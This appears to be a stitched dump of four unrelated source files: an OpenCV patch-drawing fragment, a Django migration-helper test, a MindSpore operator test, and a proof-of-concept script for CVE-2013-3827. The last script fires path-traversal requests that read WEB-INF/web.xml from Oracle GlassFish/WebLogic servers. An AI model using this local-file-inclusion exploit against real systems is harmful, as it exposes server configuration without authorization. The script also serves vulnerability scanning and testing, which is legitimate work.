points_list = [(ref_j - nHW, ref_i - nHW), (ref_j + nHW, ref_i - nHW), (ref_j - nHW, ref_i + nHW),
(ref_j + nHW, ref_i + nHW)]
for point in points_list:
cv2.circle(im, point, 0, (0, 0, 255), 1)
# <draw search area \>
# <draw reference patch>
cv2.rectangle(im, (ref_j, ref_i), (ref_j + kHW, ref_i + kHW), color=(255, 0, 0), thickness=1)
# <draw reference patch \>
# <draw similar patches>
count = threshold_count[ref_i, ref_j]
for i, Pnear in enumerate(near_pij[ref_i, ref_j]):
if i == 0:
continue
if i > count:
break
y, x = Pnear
cv2.rectangle(im, (x, y), (x + kHW, y + kHW), color=(0, 255, 0), thickness=1)
# <draw similar patches \>
# cv2.imshow('im', im)
# cv2.waitKey()
cv2.imwrite('BM_real_im_test.png', im)
|
koku/koku/test_migration_sql_helpers.py | rubik-ai/koku | 157 | 12685812 | <reponame>rubik-ai/koku
import os
from django.db import connection as conn
from . import migration_sql_helpers as msh
from api.iam.test.iam_test_case import IamTestCase
class TestMigrationSQLHelpers(IamTestCase):
def test_find_func_dir(self):
"""
Test success finding function dir
"""
self.assertNotEqual(msh.find_db_functions_dir(), "")
def test_no_find_func_dir(self):
"""
Test failure finding function dir
"""
with self.assertRaises(FileNotFoundError):
msh.find_db_functions_dir("___________no_dir_here_____________")
def test_apply_sql_file(self):
"""
Test apply sql file
"""
filename = "./___test_apply_sql_file.sql"
try:
with open(filename, "wt") as f:
print("select 1;", file=f)
self.assertEqual(msh.apply_sql_file(conn.schema_editor(), filename), True)
finally:
os.unlink(filename)
def test_no_apply_sql_file(self):
"""
Test failure applying sql file
"""
filename = "./___test_apply_sql_file.sql"
try:
with open(filename, "wt") as f:
print("select 1;", file=f)
with self.assertRaises(TypeError):
msh.apply_sql_file(None, filename)
finally:
os.unlink(filename)
|
tests/st/fusion/test_unsorted_segment_sum_fission.py | PowerOlive/mindspore | 3,200 | 12685820 | <filename>tests/st/fusion/test_unsorted_segment_sum_fission.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend")
class Net(nn.Cell):
def __init__(self):
super(Net, self).__init__()
self.unsorted_segment_sum = P.UnsortedSegmentSum()
self.num_segments = 3
def construct(self, x, segment_ids):
x = self.unsorted_segment_sum(x, segment_ids, self.num_segments)
return x
def test_net():
input_x = np.random.randn(3, 39, 1).astype(np.float32)
segment_ids = Tensor([0, 1, 2], mindspore.int32)
net = Net()
output = net(Tensor(input_x), segment_ids)
print("result", output.asnumpy())
if __name__ == "__main__":
test_net()
|
2013/CVE-2013-3827/poc/pocsploit/CVE-2013-3827.py | hjyuan/reapoc | 421 | 12685833 | <reponame>hjyuan/reapoc<filename>2013/CVE-2013-3827/poc/pocsploit/CVE-2013-3827.py<gh_stars>100-1000
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Javafaces LFI''',
"description": '''An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 192.168.127.12.0, 192.168.127.12.0, and 192.168.127.12.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.''',
"severity": "medium",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2013-3827",
"https://www.exploit-db.com/exploits/38802",
"https://www.oracle.com/security-alerts/cpuoct2013.html"
],
"classification": {
"cvss-metrics": "",
"cvss-score": "",
"cve-id": "CVE-2013-3827",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2013", "lfi", "javafaces", "oracle"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
paths = [
"/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/secureader/javax.faces.resource/web.xml?loc=../WEB-INF",
"/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF",
"/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..",
"/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF",
"/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
]
for path in paths:
resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
if resp.status_code == 200 and "<web-app" in resp.text and "</web-app>" in resp.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
return result
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.